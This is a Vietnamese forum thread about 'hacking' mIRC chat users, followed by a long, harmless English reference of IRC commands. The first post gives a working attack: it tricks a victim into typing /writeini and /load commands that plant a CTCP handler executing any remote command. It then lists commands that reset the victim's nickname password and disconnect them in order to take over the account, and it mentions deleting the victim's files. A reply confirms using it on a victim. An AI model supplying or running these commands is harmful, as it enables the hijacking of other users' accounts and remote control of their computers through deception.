Hiển thị kết quả từ 1 đến 4 / 4
 1. #1
  Tham gia
  16-10-2002
  Location
  Xin giấu mục này
  Bài viết
  2
  Like
  0
  Thanked 0 Times in 0 Posts

  Hấp dẫn đây ! Hack YM,Pas,Web...nhưng hack chat mIRC Thì sao ..nào hãy Hack mIRC cùng tôi

  cũng như những cách thông dụng của việc lấy pass mail các bạn dùng phần mềm ghi lại pass v.v... o đây mình không nói lại. Mình xin trình bày 1 cách rất là mIRC dùng chính mIRC để làm việc này.
  mIRC có 1 command gọi là ctcp (Client To Client Protocol) nếu trong remote mIRC của 1 nick mà có dòng Script sau : ctcp *:*:?:$1- | halt thì coi như mIRC của nick đó bị điều khiển được ( không chỉ riêng mIRC mà cả cái máy tính ấy cũng sẽ bị điều khiền). Bạn có thể điều khiển người ta những gì ban muốn bằng command: /ctcp Nick /command <= nick cần điều khiển, command ban muốn cho Script của nick đó thực hiên, tuy nhiên chú ý là bạn làm sao cho người ta không cảm thấy bị bạn điều khiển.
  Ví dụ: nếu nickredmask(ví dụ thôi nha) dùng mIRC mà trong remote có : ctcp *:*:?:$1- | halt , Blackmask biết được và muốn lấy pass của nick đó thì Blackmask sẽ gõ những Command sau:
  /ctcp redmask( /ns set password 11223
  /ctcp redmask( /clear -s
  /ctcp redmask(/quit
  Thế là pass nick của redmask đổi thành 11223 mà redmask không hề hay biết. Câu lệnh cuối làm disconnect redmask khỏi server đang chat, khi redmask connect trở lại, server sẽ đòi pass nick và chắc chắn redmask sẽ không khai báo thành công. Bây giời Blackmask cò thể xài được nick redmask với pass là 11223
  Vì mIRC cua nick redmask sẽ thực hiện tất cả các command do ctcp send tới nên nếu hiểu biết nhiều về Command cua mIRC các bạn hoàn toàn có thể xoá files trên máy nan nhân, tạo thư mục,...và có thể viết Script vào mIRC cua họ. Tất nhiên không tự nhiên mà trong mIRC Script cua nan nhân có dòng text : ctcp *:*:?:$1- | halt , bạn phải tự Add vào còn không thì lừa họ gõ 2 dòng lệnh sau (gõ vào như chat vậy):
  /writeini getp.ini script n0 ctcp *:*:?:$1- | halt
  /load -rs getp.ini
  thì lập tức trong Remote của mIRC của nick đó sẽ có dòng: ctcp *:*:?:$1- | halt , và bây giờ thì nick đó đang gặp nguy hiểm.
  Vì ctcp *:*:?:$1- | halt nhận tất cả các command của tât cả các nick nên nếu muốn nó chỉ nhận Command cua 1 nick nào đó ( ví dụ:Blackmask ) mà thôi thì bạn phải gõ những command sau trước khi thao tác khác:
  /auser hack Blackmask
  /writeini getp.ini script n0 ctcp hack:*:?:$1- | halt
  /load -rs getp.ini
  Chú ý:
  mIRC có thể đã(hiếm khi): /ctcps off , /remote off, hoac /ignore -t , nên các ban cũng cần chú /ctcps on, /remote on và không ignore ctcp...
  Nói về Script mIRC thì quá là nhiều Command, mình chỉ trình bày cái cốt lõi và cơ bản nhất còn lại để hack có hiệu quả thì bạn nên viết ngay 1 Script hack mIRC cho riêng mình, khi nào có nick bị dính ( dễ bị dính lắm_vì chatter rất hiếu động muốn thử xem là cái gì , và người sành sỏi Script mIRC thì không nhiều đâu) thì hãy dùng nó hack làm người dù có hiểu biết cũng chưa kịp trở tay á! Chúc các bạn thử nghiệm thành công ( Blackmask thành công trên 20 lần rồi á!) af khi naof chat mIRC thì đánh dòng lệnh
  /q blackmask chúng mình nói chuyện nha
  Quote Quote

 2. #2
  Tham gia
  20-09-2002
  Location
  Sài Gòn
  Bài viết
  2,486
  Like
  0
  Thanked 25 Times in 23 Posts
  Có vẻ là được , mình thử rồi . Nhưng mà sao vicktim của mình vẩn đổi được password mà mình đã set ?
  /ctcp redmask( /ns set password 11223
  /ctcp redmask(/quit
  Mình bỏ dòng lệnh thứ 2 , là clear-session nếu mình không lầm . Thì không đổi được .

 3. #3
  Tham gia
  01-03-2003
  Location
  Bien Hoa
  Bài viết
  5
  Like
  0
  Thanked 0 Times in 0 Posts

  Nói nhỏ nè ! hack mrc...chut xiu'!

  Hack mrc thi` Tha`nh An biet'..noi chung la co use qua 2 phan` cai` vao remote cua sript!hack pass ma dung ctcp cung thay qua roi!co dieu minh phai cai tai may nao`..roi minh biet victim use may do minh moi ctcp duoc!con` neu tu` xa th`i chua thu? wa..a` ma` blackmask chat server na`o? ban noi server thi An moi biet ma vao tra oi cung ban duoc...
  A` nhan day anh em co biet huye^n` thoai. coi sript Ba^'t Tu*?cua hacker la`m ra..nghe noi con nay` khi use thi` co chuong trinh fake IP va changes ident lien tuc nen khi ircop kill ko duoc? ma` hien gio no da di vao huyen thoai vi ko ai con` chua' con do nua~??? ai co thi` post bai` len An lien he nha!

 4. #4
  Tham gia
  13-02-2003
  Bài viết
  75
  Like
  0
  Thanked 0 Times in 0 Posts
  Các câu lệnh IRC căn bản :
  Basic commands


  /JOIN
  Syntax: /join #channel
  Joins the channel specified by #channel

  /PART
  Syntax: /part #channel
  Leaves the channel specified by #channel

  /LIST
  Syntax: /list [#channel]
  Gives a list of currently formed channels on IRC including topics and the number of users. If channel is specified, then only that channel's information is displayed.

  /TOPIC
  Syntax: /topic #channel [topic]
  If topic is not specified, shows current topic on channel #channel. Changes the topic on #channel to topic if topic is specified.

  /NAMES
  Syntax: /names [#channel]
  Gives list of users in channel #channel. If #channel is not specified, gives list of users in every channel on network (not a good idea *g*)

  /INVITE
  Syntax: /invite nick #channel
  Sends a message inviting nick to join #channel. Usable only by operators on that channel.

  /MODE
  Syntax: /mode #channel [flags] [parameters] or /mode nick [flags]
  The various channelmodes and usermodes will be discussed later in this document.

  /KICK
  Syntax: /kick #channel nick
  Kicks the specified nick from the channel. Must be a channel operator to use this command.

  /NOTICE
  Syntax: /notice (nick or #channel) message
  Sends a message to the nick or channel specified.

  /PRIVMSG
  Syntax: /privmsg (nick or #channel) message
  Sends a message to the nick specified. The difference between /privmsg and /notice is that many clients open up a seperate window for each nick that privmsgs you. Also, with most clients, the commands /msg and /privmsg synonomous. However, many clients show a privmsg to the channel as if the person were just normally typing in the channel, rather than opening a seperate window.

  /WHOIS
  Syntax: /whois nick
  Shows various bits of information on a user including their hostmask, their realname, the channels they're in, the server they're on, any ircoperator statuses and if the person is away or not.

  Mode flags

  The mode flags for both users and channels are so numerous that they're listed here in a special section seperate from the other commands.

  Channel modes:
  The syntax of the /mode command is /mode #channel [flags]. If /mode #channel is typed with no flags, the current flags of the channel are returned.

  +b
  Syntax: /mode #channel +b hostmask
  Bans the specified hostmask from the channel. To see the banlist for a channel, type /mode #channel b with no other parameters.

  +i
  Syntax: /mode #channel +i
  Makes the specified channel invite-only. This means that only clients which have been invited (via an /invite command) are allowed to enter the channel.

  +k
  Syntax: /mode #channel +k key
  Puts a key on the channel so that only people that know the key may enter. The syntax for joining a keyed channel is /join #channel key.

  +l
  Syntax: /mode #channel +l number
  Sets the limit on the channel to the specified number. This means that only that many clients may be in the channel at one time. If anymore clients try to enter they will be denied access until someone leaves the channel.

  +m
  Syntax: /mode #channel +m
  Moderates the channel. Only people who are mode +o or +v may speak in the channel. All other clients will get an error message "Cannot send to channel."
  +n
  Syntax: /mode #channel +n
  Prevents people from outside the channel from sending messages to the channel through use of the /msg or /privmsg command.

  +o
  Syntax: /mode #channel +o nick
  Gives the nick channel operator (chanop) status. Chanops have access to many commands that normal users do not including: the ability to change channel modes, kick people, change the topic, able to talk in a +m channel and invite people to the channel.

  +p
  Syntax: /mode #channel +p
  Prevents the channel from showing up when someone issues a /list command.

  +s
  Syntax: /mode #channel +s
  Prevents the channel from showing up when someone issues a /list command and also stops the channel from being shown in the /whois information of a user.

  +t
  Syntax: /mode #channel +t
  Prevents anyone other than chanops from changing the topic.

  +v
  Syntax /mode #channel +v nick
  Gives the person a "voice" or the ability to speak in a channel moded +m.


  User modes:
  To change a usermode, a person may do one of two things. They may either type /mode theirnick [flags] or /umode [flags]. Typing /mode nick or /umode without any flags returns the current flags of the user. All commands marked with a * are for ircops only. Note that although some of these modes may be turned on by a non-oper, the user must be moded +o for them to have any effect.
  * +a
  Denotes services admin status. Services admins have access to global ircop commands as well as other commands such as /samode and /sajoin.

  * +A
  Denotes server admin status. Server admins have access to global ircop and services admin commands plus have access do AdminServ on their servers. AdminServ is used for various tasks such as adding ircops, changing the MOTD etc.

  * +b
  Allows the client to send and recieve chatops. Chatops are one of the types of server messages that ircops can use to communicate with each other.

  * +c
  Allows the client to see when other clients connect to and disconnect from the server. +c also shows the ip and the port of the clients that connect.

  +e
  Prevents the client from using DCC to chat or send and recieve files.

  * +f
  Allows the client to see when a user sends, either through /privmsg or a normal send to the channel, a message consisting of a large number of characters. Messages containing too many characters can cause problems with some of the Conference Room java clients.

  * +g
  Allows the client to see globops messages and also other global messages sent by the server.

  * +h
  Allows the client to see when another user issues a help to the server (through the use of the /raw or the /quote command.) This flag is commonly known as "helpops" and users with this flag can be identified by the "* JoeUser looks very helpful" comment when a /whois is done.

  +i
  Prevents a user from being seen when a /names or /who is done on a channel or the server when the user issuing the command is outside the channel.

  +m
  Prevents a user from sending messages via the /privmsg or /msg commands.

  * +o
  Allows the client to have access to numerous ircop commands which will be covered later.

  +p
  Prevents the client from using ctcp commands such as ping, version, etc. ctcp commands will be covered in a different section.

  * +s
  Allows the client to see certain types of server messages relating to netsplits, kills and such.

  * +t
  Allows the client to see when someone on the same server issues a /stats, /version, /time and other information commands.

  +w
  Allows the client to see wallops. Wallops may be seen by anyone but may only be issued by clients moded +o.

  +x
  Masks the dynamic part of the clients ip (showing the client to have an ip of ident@***.bar.com or ident@255.255.255.***)

  * +y
  Allows the client to see when another client on that server is issuing a /whois on them.
  Advanced commands (including ircop commands)

  All commands marked with a * are for ircops only.

  /ADMIN
  Syntax: /admin [server]
  Displays administrative info about the server specified, or the server the client is on if no server is specified.

  /AWAY
  Syntax: /away [away message]
  Sets a user away. Anyone sending a /msg or /privmsg to the user will get the away message as a reply. To set yourself back, type /away with no following parameters.

  * /CHATOPS
  Syntax: /chatops message
  Sends a message to all users who are moded +b.

  * /CONNECT
  Syntax: /connect split-server [port] [connected server]
  Used to connect split servers in the event of a netsplit. If only one server is specified (e.g. /connect irc.server.net) then that server will be connected on the default port for that server. If a port is specified (e.g. /connect irc.server.net 7325) then the server will be connected on that specified port. If a second server is also specified, (e.g. /connect irc.server.net 7325 irc.otherserver.net) then the first server, (which is split from the net) will be connected to the second server, (which is still on the net) on the specified port.
  * /DIE
  Syntax: /die
  Causes the server to shutdown, closing all connections to that server. Use caution when issuing this command as some servers do not restart after being died. If the server does not restart, then it must be manually restarted from the console that the server is running on.

  * /GLOBOPS
  Syntax: /globops message
  Sends the specified message to all people who are moded +g and +o.

  /INFO
  Syntax: /info [server]
  Gives the user info about the server including when it was started, the version of the server, how to connect to the sever and other various useful bits of information.

  /ISON
  Syntax: /ison nick [other nicks]
  Returns if the nick or nicks are on irc at that moment.

  * /KILL
  Syntax: /kill nick [reason]
  Disconnects the specified nick from the server with the reason given as part of the quit message.

  * /KLINE
  Syntax: /kline hostmask [reason]
  Bans the specified hostmask from the server. Use the /unkline command to remove a kline.

  /LINKS
  Syntax: /links
  Gives a list of the servers connected to the current server along with a partial representation of how they are connected.

  * /LOCOPS
  Syntax: /locops message
  Sends a message to all users on that server that are moded +o

  /LUSERS
  Syntax: /lusers [server]
  Gives the number of users on the network or server, including number of invisible users, channels, and ircops.

  /MOTD
  Syntax: /motd [server]
  Displays the MOTD (message of the day) on either the current or specified server.

  * /OPER
  Syntax: /oper nick password
  Grants a user ircop status and modes the person +o as well as other modes specified within the server's internal settings. Note that the nick is not dependant on what the user's current nick is and is dependent on what the o-line on the server uses as the nick. For example, if the o-line read as: O: nikb@*.otenet.gr * NikB then the user would type /oper nikb password regardless of what their current nick was.

  /QUOTE
  Syntax: /quote parameters
  Sends raw commands directly to the server. Can be used for countless purposes.

  * /REHASH
  Syntax: /rehash
  Forces the server to reread and process it's configuration file.

  * /SAJOIN
  Syntax: /sajoin #channel
  Allows a client to enter a channel which has had some sort of restriction placed on the client, (e.g. the client is banned, the channel is +i or +k etc.) Usable only by clients that are set to umode +a or +A.

  * /SAMODE
  Syntax: /samode #channel flags [parameters]
  Allows a client to change the modes on a channel in which they are either not in or do not have operator status in. Usable only by clients that are set to umode +a or +A.

  /SILENCE
  Syntax: /silence nick or hostmask
  Causes the selected nick or hostmask to be ignored. To remove the silence, add a minus sign to the beginning of the nick or hostmask. (e.g. /silence -cHaOs).

  * /SQUIT
  Syntax: /squit server [reason]
  Disconnects the specified server from the network. An optional reason may be given and will be displayed as part of the servers disconnection message.

  /STATS
  Syntax: /stats flag [server]
  The /stats command returns different types of information about the server depending on what flag is specified. Some common flags are listed below

  c
  Returns which servers the current or specified server is set up to connect to.

  h
  Returns which servers are set as "hub" servers.

  i
  Returns what clients are allowed access to the server.

  k
  Returns what clients are forbidden access to the server.

  l
  Returns what servers are set as "leaf" servers.

  m
  Returns a list of commands the server accepts.

  o
  Returns a list of what clients are able to access ircop commands.

  q
  Returns a list of what nicknames are prohibited on the server.

  u
  Returns how long the server has been up.

  /MODE <nick> <mode>
  MODE offers some extra options after you have used the /OPER command. Most modes, except +n, +i, and +m, will automatically be set by the server as soon as you use the /OPER command
  Remember that you can get a list of available modes via
  /mode ?
  so there's no need to memorize everything.

  +/-c
  This mode controls the seeing of "Client connecting", "Client exiting" messages. If they annoy you, turn them off.
  +/-d
  When you enable the deaf mode, you won't receive any messages sent to a channel. Useful for bots, but not likely for much else.
  +/-g
  This option controls whether you will see GLOBOPS messages. GLOBOPS are sent by other IRC Operators, or by services.
  +/-h
  Enables the seeing of HELP requests, and adds the line "looks very helpful" to your /whois information. Hardly anyone uses help requests, so this mode is not too useful. More of a vanity mode :-)
  +/-i
  Invisibility. This one will make you invisible from /who and /names, except if the person doing the /who or /names is on the same channel as you are. You're not really invisible, any user that cares to read the available documentation, knows that +i IRC Operators can be found using /trace ;-)
  +/-k
  Kill messages. If you enable this, you will see KILLs sent out by services, servers, or other IRC operators
  +/-l
  Linking information. Enabling this option sends you information about network splits, connections, and all other stuff concerning network linking. It's highly recommended that you keep this one on.
  +/-m
  Mode override. Intended to be used on channels where mode wars make it very hard to use services' mode commands, or when services are unusable. This mode also blocks KICKs. Try to use other methods whereever possible, and when using +m, disable it as soon as possible. Be aware that all online operators are informed about usage of this mode!
  +/-n
  No invite. Noone will be able to /invite you, except if they try to /invite you to a +ci channel, on which you knocked first
  +/-o
  Operator status. If you want to be off-duty, not use operator commands, or anything, then set mode -o to disable operator commands. Please note that if you have disabled +o, but didn't disable +g, you can still read and use GLOBOPS
  +/-s
  Server notices. Makes the server send status messages to you, and report errors. Highly recommended to keep this enabled.
  +/-u
  Usage of mode override. When this mode is enabled, you will receive notification if any operator uses the +m mode.
  +/-w
  Wallops. When enabled, you'll see all /WALLOPS messages.

  /TIME
  Syntax: /time [server]
  Returns the time according to either the current server's clock or the specified server's clock.

  /TRACE
  Syntax: /trace [server]
  This command gives a list of connections on either the current server or the specified server.

  /USERHOST
  Syntax: /userhost nick
  Returns the hostmask for the specified nick

  * /WALLOPS
  Syntax: /wallops message
  Sends the specified message to all users moded +w. Although non-ircops may set themselves +w, only ircops may send messages via the /wallops command.

  /WHO
  Syntax: /who parameter
  The /who command can be used for several purposes. Typing /who hostmask will give a list of all users on the network with that hostmask. /who #channel will give a list of all users in that channel. /who server will give a list of users on that server. Wildcards may be used at any time... (eg /who * would list every user on the network.)

  /WHOWAS
  Syntax: /whowas nick
  Returns the hostmask and realname of a user who has recently left the network.

Bookmarks

Quy định

 • Bạn không thể tạo chủ đề mới
 • Bạn không thể trả lời bài viết
 • Bạn không thể gửi file đính kèm
 • Bạn không thể sửa bài viết của mình
 •